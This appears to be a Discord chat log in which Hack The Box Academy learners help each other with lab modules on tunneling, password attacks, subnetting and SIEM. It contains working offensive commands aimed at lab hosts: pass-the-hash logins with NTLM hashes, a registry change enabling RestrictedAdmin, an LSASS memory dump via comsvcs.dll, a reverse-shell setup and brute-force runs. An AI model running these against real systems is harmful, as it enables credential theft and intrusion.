Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data that is secured using SSH
This is the first sentence in the module section
i think chisel uses multiple ssh connections nvm
i think its multiple ssh channels
so its faster than normal ssh -D or idk why its faster
So if SSH has been disabled, then chisel won't work. Isn't that correct?
Maybe it's a typo? I mean we use SSL for encryption. Do we also use SSH for encryption?
ssl and ssh are two different things
chisel uses the ssh protocol to transport data, it comes bundled to the binary, it doesn't need it to be installed on the host
Okay. So that means even if the internal host doesn't have SSH server running, we can perform dynamic port forwarding with chisel?
yes, which is what I said to begin with 
Okay thanks
The first sentence in the section had SSH, which got me confused
it does but ssh doesn't need to be installed
Thanks for this.
I use a word processing app for notes in the modules and then use MindNode, a mind-mapping application, for the cheat sheets and the exercises. When I'm doing the exercises, I copy and paste all of the commands I executed that led to the answer and their output and add this into the mindmap. This way I can search through all that I've done and search the cheat sheets too
https://academy.hackthebox.com/module/144/section/1256 In web gathering, I am trying to find the FQDN of an IP... Here I added the DNS name and IP in my /etc/hosts file, but cant seem to resolve it with nslookup... (I am trying nslookup -type=NS inlanefreight.htb)... Any help pls or suggestions?
host is up btw. ping works
FIXED it... specified IP, thanks...
anyone have done sliver module here
I have
i am not able to get shell in probing the surface section
i followed the exact same commands
Works on my machine, check that you have correct IPs and check that byte code is actually made to your IP. Also check that you have correct port and address in listener
Summarizing each section in your own words is really great. I take hand-written notes through each section and summarize similarly where needed. Even if I rarely reference those hand-written notes it's the act of writing that helps me retain things.
My more elaborate solution is a personal wiki I run locally. A section for services / services by port number and a section for tools where I note odd-ball flags and copy-paste-mangle examples I can grab quickly. I wouldn't advocate for such a solution -- do what works best for you -- but be mindful about locking your data into proprietary formats / cloud-systems that are either prone to corruption or would be very difficult to migrate away from (e.g. I'm looking at Cherry Tree). My wiki is based on collections of ASCII files, so worst-case I can always get at the contents if something broke in the software.
for Exploiting Web Vulnerabilities in Thick-Client Applications
anyone knows where is fatty-client.jar located at ?
only saw these 3 notes.txt
Why can't I write to general?
Hi everyone, I'll be frank and direct, I'm in the password attack section, in the form:
PASS THE HASH, I have to answer the last question, which asks me this:
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
I used these commands in sequence
1- $ evil-winrm -i 10.129.204.23 -u julio -H 64f12cddaa88057e06a81b54e73b949b
C:\Users\Administrator\Documents> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
2- $ evil-winrm -i 10.129.204.23 -u julio -H 64f12cddaa88057e06a81b54e73b949b
C:\Users\Administrator\Documents> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
then
$ xfreerdp /v:10.129.204.23 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453
open cmd as admin
nc.exe -lvnp 8007
open powershell as admin, in sequence
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e -base 64 payload- "
this is the result:
Can someone tell me what went wrong?
you took the ip from your host machine?
or the ip from this compromised machine?
" (the target machine, DC01, can only connect to MS01)"
172.16.1.5
but in the module it said that you could put DC01 as target, is that wrong?
I'm not understanding if I should use it as a target
172.16.1.5
172.16.1.10
or DC01
you can use dc01 as the target
what is the IP you're using in your revshell payload though, was the question
172.16.1.10 or dc01, either one works
but you aint getting a connection back
meaning you either listening to wrong port or wrong IP
what he suggested to me, I put this in the payload:
172.16.1.5
Try changing the domain to inlanefreight too instead of inlanefreight.htb
Not sure if it works but that's what I did back then
Should I put the one ending with .10 in the payload?
what does ipconfig /all tell you the IP is
in the payload
for your compromised host
ok and does your payload use the right port?
also i think this module uses .local not .htb
switch inlanefreight.htb --> inlanefreight.local
checked mine and i used htb aswell, and it worked
damn a real windows machine user
so I transform this: Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb
in Invoke-WMIExec -Target DC01 -Domain inlanefreight.local, right?
been a minute then
yea worked for me
it could also be a case of for whatever reason the internal network isn't working properly
a very good advice
use linux machine for hacking
and the resolution would be to change vpn regions
or something magically added when pasting your payload
this doesn't matter for this instance dude
this is attacking from a domain joined windows host
yes but is good advice
depends really. You'll get kicked out if sysadmin sees a kali machine on network
(red team assessment)
unless you ask very nicely
nah i know someone that had to beg their SOC guys to let him have kali to do internal pentests 
Tf
iirc someone else had the exe whitelisted but not one of the subprocesses for virtualbox, so it couldn't network
Oh I see
did you remake the payload?
Anyone knows where the fatty-client.jar is located?
should I change the ip address to .10?
I mean, could you tell me how to change it? Could you be a little more clear?
your revshell should use the 172.16.1.5
no, 10 is not correct
172.16.1.5 is correct
https://www.revshells.com/
ip and port set
make sure they are correct and your listener is listening on the correct port as well.
when just clicking and selecting the right payload, i get the same revshell b64 encode that @fringe urchin got
starts with the same characters anyway
ah i see your issue
you turned on advanced options; and thus further changed the payload
you added an extra layer of b64
you changed these options
that's why it's not working
also the -Target isn't 172.16.1.5-Domain
it's the DC01/172.16.1.10
marcie so if I understand correctly I have to turn encoding to none, right?
yes you leave it at default
^
you can as well see the payload on the right is yours and it starts with "CG...." and on the guide it starts with "JAB"
and if you check mine, it starts with "JAB" too
the payload you generated was a b64 payload OF the powershell payload
meaning it would need to first decode then decode again
ok guys, thank you because I solved it. I love this environment, you are always so helpful. Thanks again guys, you are magical
i mean the module doesn't show that option selected, so you shouldn't select it
in reality the form doesn't show that part at all, so by pressing the link, I didn't pay much attention to the fact that it was set since it doesn't mention it
Working on Command Injections -> Identifying Filters. I've gone through all the discussed characters to test. I've found, what I believe, is the character that isn't filtered out, however when I try to answer the question, it tells me that it's incorrect. Am I misunderstanding something?
if it doesn't look similar to the example, you're doing something wrong
the example shows it start with powershell -e (this tells powershell you're passing it encoded text btw)
in fact, I follow your advice that you gave me some time ago: if the path you're taking isn't right, change it, only when I really have no other alternatives I have to ask for a suggestion
Hi, can you guys please help me? I just can't create an lsass.dmp file. I am running this command in PowerShell, but whenever I search the folder that is supposed to contain the lsass.dmp file, it is empty:
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\users\htb-student\documents\lsass.dmp full
I am in the module password attacks Attacking LSASS
is that both one command? isn't "C:\windows\system32\comsvcs.dll" the victim machine and "C:\users\htb-student\documents\lsass.dmp" your attacking machine? I'm pretty sure that's not how the command works,
you put the file path and then the file destination, it can't be your local machine, you will need to manually transfer it over
no this looks right(ish)
but you do need to be sure the PID is correct
but isnt his second path his local machine?
ah then my bad, i got confused since i saw "htb-student" and thought he is on his local machine
The original command is: PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
But I just can't create the dump file there either.
try running it from CMD instead of powershell
also is the PID correct
is that the PID of the lsass process
right. sorry for that 
It is not working either. I thought it was because of the AV on the target machine, but there is no AV.
nice you fixed it, what'd you do?
nothing. came home from work, booted up, tried it once more and it worked
....
now im stuck on last question 
Sorry for that, i am trying every possible thing that comes to my mind lol
i didnt went with powershell path, i just went to task manager and dumped it

bad
use my tool
i was doing that on a macbook + htbs box. i really hated that time 

rdp is stinky, do everything in the command line
yea rdp sucks, but the main problem was i had to use my dad's macbook, 13 inch screen.... till my computer arrived.
Task manager. Can you tell me how you get the dump file that way?
whats the error this gave you
if you can dump it via task manager you can dump it in the command line
Omg thanks a lot
but like xreous said, if you can do it with task manager, it works with cmd/powershell too
just gotta have the right process ID
@trail sail your issue is that you just copy/pasted the command from the section, the PID from the example and the PID from the lab won't generally match unless by cosmic coincidence
module: Password attack
section:Pass the Ticket (PtT) from Linux
Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
well i found the ticket for linux01 but i cant seem to connect to it?
i tried importing it and then using it with wmiexec like shown above, i tried uploading it on the windows machine (Ju***) and importing the ticket via rubeus.exe (i converted it before to kirbi) but that didn't work either.
any nudge on what im doing wrong?
the PS C:\Windows\System32\ > is your cwd in powershell in the example command; everything after is the actual command to run
you shouldn't need to do anything to it if you found it in the appropriate place, make sure it's not expired
the AD Enum labs has been spawning weirdly on US servers
also it's asking you to just access the share no?
why are you trying to use wmiexec instead of just smbclient?
i swear ive been trying to connect to it for an hour or two
im EU so i should be fine
i found the file in: /v**/l**/s**/d*/
ehm well if i already used wmiexec for the julio share, then the linux01 share shouldn't be much different
also you don't need to do anything from a windows machine for this section
the error is the machine account doesn't have RPC access
so why not just try accessing it via the intended smbclient method
isn't this the one that also has a silly unintended?
error "REQUIRED_FIELDS"
I honestly don't remember
it's been a while
what academy module does this relate to?
i was looking if i can upload pics
SECURITY MONITORING & SIEM FUNDAMENTALS
Page 7
SIEM Visualization Example 2: Failed Logon Attempts (Disabled Users)
For question 2 I assumed it is admin* after user.name: since that is what it shows in one of the working queries and it does perform the outcome explained. If someone can help steer me in the right direction it would be much appreciated. Thanks
think about more than just admin-stuff where else can the stuff be?
your filter catches admin-lol but what if it's sqladmin?
Has anyone finished the "Introduction to Windows Evasion Techniques" module? specifically SA2. I have two different techniques that work fine when I run them manually on the provided user, but they don't run on the automated user. Wondering if its skill issue (as always right?) or else. Would love to chat about it
Just completed the hard firewall/IDS/IPS lab, only took a few hours of smashing my head off the wall now I feel like an idiot 
just read
(but it's genuinely funny)
proxychains4 smbclient -k //dc01/linux01
would that in a normal case suffice? cuz it doesnt for me 
try adding -N
i didn't pivot for this, i just used the provided Linux host
from the svc_ user?
from root
well yea , svc_ > root
Hlo guys
How to give write permission to /usr/share/wordlists
did you import the KRB5CCNAME after switching to root
yea
weird
i mean you really don't need write permission, just read permission
[---][---][---]
r = 4
w = 2
x = 1
you'd want the general perms to be 644
r/w owner, r group, r others
rw-r--r--
Tnx
thank you very much! *
got it!..... not sure till now why i couldnt just pivot tho?
ty 
I wouldn't suggest editing pre-made password lists
Does anyone have or have edited/crafted a better cheat sheet for the Linux priv esc module? The one they provide is a bit messy and I'm wondering if someone has done the hard work for me to make it nicer haha
If you need to edit it, just use a different list
Okkk.
Don't dm without asking
Im a bit confused on the "Using Splunk Applications" section, am I supposed to install the Sysmon app onto my version of splunk or onto the version pwnbox provides me?
As in, do i have to download the sysmon app within the VM and add it into the Splunk from the "targeted IP"
I looked for that in the apps and sysmon isn't there. I'm going to try to download it from the VM
You can't
At least on the target*
Targets don't have internet access
But I'm sure the section details steps
The footprinting module is kicking my butt.
So i read online and other people had the same issue of not having access to the sysmon app during that section, but there is a way to get an answer for the question without having to access it.
Kinda of a curve-ball section tbh
@wide river i sent you a dm if you dont mind.
for aen, is the "vhosts needed" section a spoiler or are they required to know beforehand
Yes
Anything regarding the questions or reading is a spoiler
The whole module uses the same lab
So you shouldn't need to look beyond p1
Has anyone else had some issues with targets not spawning lately? Yesterday I had a lot of trouble spawning in the AD Trust attacks module. Now im experiencing the same thing. Just seems to hang and refreshing the page gives me the option to spawn again....
been an ongoing issue for a while. try changing regions (ie. US -> EU, or EU -> US)
Thank you for the sanity check.
I will type it from now on, following the example. Thanks, Schainy! It is true, this is not the first time I have had that issue with a command from the section by being lazy and doing a copy-paste.
I am having an issue in the AEN module Exploitation & PE section ... in the DNN dash I have added asp,aspx but when I go to upload the webshell it say file extension not allowed ... any idea what the issue is and how to resolve this?
Maybe the folder does not have the right permissions. Although the list you are showing allows the extension, the folder does not.
you could be right ... let me poke around
Quick question. How do we get the octet values for octets 2/3/4 when the bit values are set to 0 and not 1? 1st Octet - Value: 192
IP Addresses
Values: 128 64 32 16 8 4 2 1
Binary: 1 1 0 0 0 0 0 0
If we calculate the sum of all these values for each octet where the bit is set to 1, we get the sum:
Octet Values Sum
1st 128 + 64 + 0 + 0 + 0 + 0 + 0 + 0 = 192
2nd 128 + 0 + 32 + 0 + 8 + 0 + 0 + 0 = 168
3rd 0 + 0 + 0 + 0 + 8 + 0 + 2 + 0 = 10
4th 0 + 0 + 32 + 0 + 0 + 4 + 2 + 1 = 39
What is your overarching question, subnet masks?
Or?
Often you don't worry about the binary of an ip
It comes more into play with subnet masks
Not able to spawn targets. Is this an issue right now?
Gotcha, to answer you. I am a noob just fyi lol, how do we determine on the 2nd, 3rd, and 4th octet (info above) which bit has a value of 1 or 0? If that makes more sense
Your larger questions seems networking related
ye
Again you don't ever generally worry about the binary ip
gotcha
Yes it's adding the bits
But you are almost always interacting with a decimal ip
You only get concerned with binaries in subnetting and subnet masks
There's an intro to networking module that goes over basics
yeah. I cant either.
Subnet masks are always filled left to right so you don't get any mask that's 00011000 in any octet
As a mask is an informational piece, how many networks and how many hosts per network
192.168.0.3/24 is on a separate subnet than 192.168.1.3/24
right bc the 3rd octect is different
It's purely bc of the mask
The mask dictates the range
If they were /16 they would be on the same network
(And this is with standard ranges, not /25 /26 /27 masks
Also a good thing to remember
ill make sure to do so haha
Every time you add 1 you divide the number of hosts/network size by 2
So /25 has 1/2 as many hosts as /24
Cause powers of 2
right makes sense
And it goes inverse
But you generally don't work backwards
You usually start with a base, and depending on the number of networks and hosts needed, you do your subnetting from that
that makes a lot more sense
And if your needs don't fit into a power of 2, you take the next highest power of 2 to your needs
So 100 hosts per network you'd adjust to 128 hosts
The usable hosts is just your size -2
Because the last address in a subnet is broadcast, and first is the network itself
can anyone give me a nudge on the new broken auth skill assessment?
where are you stuck
I'm gonna venture and say enumeration? I have brute forced usernames list and found a bunch of valid usernames, but none of them seem like an account with admin privs.
Are you sure you're running the tool correctly? I only found one result when I tried.
You can DM me the command if you want.
Attacking common services : DNS
Am i missing something here?
```
;; Connection to 10.129.186.37#53(10.129.186.37) for subdomain.inlanefreight.htb failed: host unreachable.
;; no servers could be reached
```
sudo ./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
resolvers.txt has the target IP also. Just getting errors and nothing resolving.
Man I'm stuck on this module
what happens if you axfr with dig?
This 3 times:
```
;; Connection to 10.129.186.37#53(10.129.186.37) for inlanefreight.htb failed: host unreachable.
;; no servers could be reached
```
Did your vpn connection die?
it feels like your host died
Or host died
refresh the page and make sure the host is up, as MarcieLee mentioned make sure you're connected to the VPN if you're using a VM
ive reset it, twice. host too. let me just redownload a file and reset host
if you continue to have problems changing regions is a good idea too
yeah just had to redownload vpn file
why did I lose all my unlocked modules?
Please limit the pinging of users and wait for someone to respond to you
I suppose I just have to wait. Is there a way to crank up the speed for Hydra SSH brute forcing?
No but what if there were other services, maybe the password of users on those services would be the same as the ssh ones, at least for some of them
-t flag can be used in hydra to increase the number of threads that are used for bruteforcing. However, using a large value might result in DoSing the service such that the port temporarily closes due to congestion and certain packets might be dropped, resulting in no success even when the password is present in the wordlist. Having said that, SSH bruteforcing is slow and it doesn't allow too many connections. You should try to find if there are other services running on the server.
Yes I'll correct myself, there is the -t flag, and you can use it with other services, but not for SSH (you even get a warning about it when you start hydra with SSH, as you can see in the screenshot you shared)
ok
@thorn vapor this is not the server for such queries
@split glade @eager ledge Really appreciate the help guys. I will try ||FTP|| since the server doesn't seem to support ||SMB. [ERROR] target smb://10.129.202.64:445/ does not support SMBv1 ||
However ||FTP|| also seems quite slow but maybe that is because the SSH BF is running in the background?
Hey guys, I got a problem with academy: Attacking Web Applications with Ffuf. On the last paragraph there is the question: "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" I have indeed the right answer, but it's not accepted..
You can tweak the -t flag. In a real world pentesting situation, you would leave the bruteforcing over night with the default number of threads, say 16. However, while doing labs, it is not feasible since the machine's life can only be extended up to 6 hours. So, you want to speed up the process by increasing the number of threads. Thanks to @fathom pendant for doing hit and trial to find the sweet spot 48. More threads than that and the service won't respond properly. Fewer threads will result in taking too much time.
And does 48 apply to all services or just ||FTP||?
About your error, without going into details, for some protocols it's best to use hydra, some crackmapexec, some crowbar, that's (probably) why they teach you the 3
From the top of my head:
- hydra: default
- crackmapexec: SMB (cf your error)
- crowbar: RDP (I had a box where crackmapexec would just return every credentials as valid, and an other where it couldn't find any valid credentials)
(zombiiieee beat me to it)
Not all the services, just that one. As @split glade mentioned crowbar is preferred for RDP, crackmapexec for SMB
Didn't know that crowbar is preferred for RDP.
Reading this again, it actually doesn't say that it's SSH which must be brute forced :--)
hydra can do those too but you'll need to compile it yourself per the documentation
Wondering why that makes a difference? When you compile it yourself/use the prebuilt on the machine
Do you know if crackmapexec can also be used for bruteforcing of SMB or just listing and connecting etc.?
Yes it can be used for bruteforcing too, that's in the module
the prebuilt one doesn't support a lot of the protocols
I wouldn't recommend bruteforcing (not spraying) SMB btw, especially with cme because it's very slow. if you want to brute AD, it's better and much faster to use LDAP/kerberos
but most of the time it will have account lockout so bruting is out of the question
Interesting! Currently only a small step into the password attacks module so I believe that will be covered in later sections.
If it's not there's a well explained part in "Active Directory Enumeration & Attacks" (I did it not long ago)
kerbrute is one of the tools but I don't remember the module where they talked about it
https://academy.hackthebox.com/module/143/section/1265 -> Kerbrute - Internal AD Username Enumeration
And it's indeed incredibly fast in comparison
Hi htb dude,
Do you know why the htb windows remote host is moving so slow?
It's time consuming to take control of the Windows host.
And it's really a waste of time and money to me. Hack the box should fix this issue.
I have an annual subscription of cpts.
Whoever from htb support is here, fix that issue guys. You never know the feeling when that fcking windows host is moving so slow.
Contact the support team. The support team does not monitor this Discord server
Any1 else having issues spawning targets?
ye
clearing last 24 hour cache files fixed my issue.
I'm not sure what I did wrong when I tried log poisoning
The output of shell is empty
Any updates about spawning targets in modules, I cannot spawn any target
nope just wrote to support but no answer
same here
Hello, could anyone help me on module "Password Attacks - Skills Assessment Hard". I am using the module given username.list and password.list along with the credentials I got from Lab Easy and Medium (not sure if this will help). I use crackmapexec to do password spraying on the SMB service but when I ran it for about 20 minutes it got a connection timeout and I couldn't really get a valid credential to start with this section. I'm not sure if I should keep password spraying SMB or if I am in the wrong direction, could you give me some pointers.
Thanks.
Here's what I've done so far
```
crackmapexec smb 10.129.202.222 -u "johanna" -p password.list
hydra -l "Johanna" -P password.list rdp://10.129.202.222
hydra -l "johanna" -P password.list rdp://10.129.202.222
crackmapexec winrm 10.129.202.222 -u "johanna" -p password.list
hydra -L username.list -P password.list smb://10.129.202.222
crackmapexec smb 10.129.202.222 -u username.list -p password.list
hydra -L username.list -P password.list rdp://10.129.202.222
crackmapexec winrm 10.129.202.222 -u user.list -p password.list
```
So I am not the only one... I almost thought I was crazy
Day off of studying today I guess... Hope it gets fixed soon
It's neither of those protocols
(if that helps)
Neither SMB nor RDP? Thanks, I will start working on other protocols then
My bad, I was looking at the wrong note, look at the password mutation chapter
OK I will try that then, the Hydra estimate time was 40 hours for mutated password list so I got apprehensive. Thanks for the guide
try a tool called crowbar
Oh yes, looking at my notes it's where crackmapexec was completely unreliable on RDP cf #modules message
hi
Hello, I need to be able to chat in HTB: SERIOUS DISCUSSIONS channel
so targets are spawning again ?
for me, yes it did spawn
Yep, same here
Module: Pivoting, Tunneling, and Port Forwarding
Section: SSH for Windows: plink.exe
Can someone please clarify whether Proxifier needs to be used in conjunction with Plink or are they two independent methods?
From my understanding, it does need to be used in conjunction. I'm just looking for someone to validate my understanding. Thanks.
I would test it out but I haven't got access to a Windows VM atm.
Thanks for validating my understanding, Sudo6!
Module: Analyzing Evil with Sysmon & Event Logs. I need to modify Event ID 7 in sysmonconfig-export.xml, but such an event doesn't exist. Could anybody advise?
I was just using this lol but yeah just like you need proxychains for Linux to set up the proxy you can use Proxifier on Windows to set up the proxy
It's a bit of a shame that they don't give you a windows host to RDP to and try this out
hi mate
Yesterday I was not able to clear the first section; now I am on DNS Tunneling with Dnscat2. I just cleared the first 3 practical sections deeply. They boosted me.
tip: upload the scenario images to chatgpt and write "explain this image", then boom!!!!! you will get everything
for every section
We need a Splunk module
Hello
In the Attacking Enterprise Network module, I am trying to PrivEsc the Windows host
However, I have tried several tools, but none of them work, and they all produce this error:
ok give me a minute